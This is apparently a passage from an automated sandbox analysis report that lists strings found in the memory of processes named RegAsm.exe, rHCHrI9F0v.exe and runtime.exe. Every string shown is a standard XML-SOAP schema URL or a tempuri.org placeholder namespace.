Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000028F2000.00000004.00000800.00020000.00000000.sdmp, runtime.exe, 0000001E.00000002.2503853991.0000000002546000.00000004.00000800.00020000.00000000.sdmp, runtime.exe, 00000023.00000002.2767317334.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, runtime.exe, 0000002C.00000002.2706063855.000000000272E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/D
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002BB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002B38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002B38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002B38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000034AB000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003497000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.000000000369D000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002B38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.000000000369D000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002B38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000028EA000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.000000000369D000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002B38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002B38000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002B38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003694000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.000000000369D000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.000000000369D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: RegAsm.exe, 0000000B.00000002.2110237826.000000000369D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.000000000369D000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003491000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: RegAsm.exe, 0000000B.00000002.2110237826.0000000003351000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
